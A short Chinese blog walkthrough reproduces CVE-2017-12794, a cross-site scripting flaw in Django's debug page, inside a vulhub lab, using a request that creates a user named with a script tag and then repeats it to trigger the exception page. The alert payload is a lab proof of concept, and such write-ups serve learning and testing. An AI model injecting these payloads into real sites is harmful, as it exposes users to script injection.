0
点赞
收藏
分享

微信扫一扫

Django debug page XSS漏洞复现_(CVE-2017-12794)

Django debug page XSS漏洞复现_(CVE-2017-12794)

复现过程

首先进入靶场环境

image-20231110152918702

按照他写的,需要给这个变量赋值

image-20231110153700531

创建一个用户,用弹窗做用户名

http://10.4.7.137:8000/create_user/?username=<script>alert(1)</script>

image-20231110153946042

返回,然后再创建一个一样的

触发异常弹窗

image-20231110154031232

异常为

duplicate key value violates unique constraint "xss_user_username_key"
DETAIL:  Key (username)=(<script>alert(1)</script>) already exists.

详情见

https://vulhub.org/#/environments/django/CVE-2017-12794/

举报

相关推荐

0 条评论